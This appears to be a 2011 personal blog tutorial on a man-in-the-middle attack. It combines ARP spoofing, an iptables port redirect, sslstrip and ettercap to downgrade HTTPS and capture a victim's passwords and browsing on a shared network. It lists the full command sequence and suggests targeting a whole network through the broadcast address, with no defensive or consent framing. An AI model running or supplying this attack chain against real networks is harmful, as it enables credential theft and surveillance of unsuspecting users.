Thursday, 28 April 2011

ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, new blog post and vid are here this is what I did:

Firstly I edited etter.conf to allow the usage of ip tables,
then enabled ip forwarding,
next arp spoofed the broadcast address.

This step tells the router that I am the victim and the victim I am the router. You can set the I.P. to that of one machine or if you use the broadcast address, in my case 255, you can target the victims network.

The next step is to set up the iptables, this takes anything coming in on port 80 i.e. internet traffic, and puts it on to port 1000 which is where sslstrip is running.

sslstrip removes the SSL encryption, this is done by removing the request from the client for the ssl certificate.

Once you have removed this you can then do what ever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in realtime. You can also use driftnet which shows the images from the website that your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables for linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables ip forwarding)
you can use cat  /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000 so
sslstrip -a -k -f  (these commands kill the session and work quietly)
ettercap -T -q -i eth0

The video:
Arp spoof vid


No comments:

Post a Comment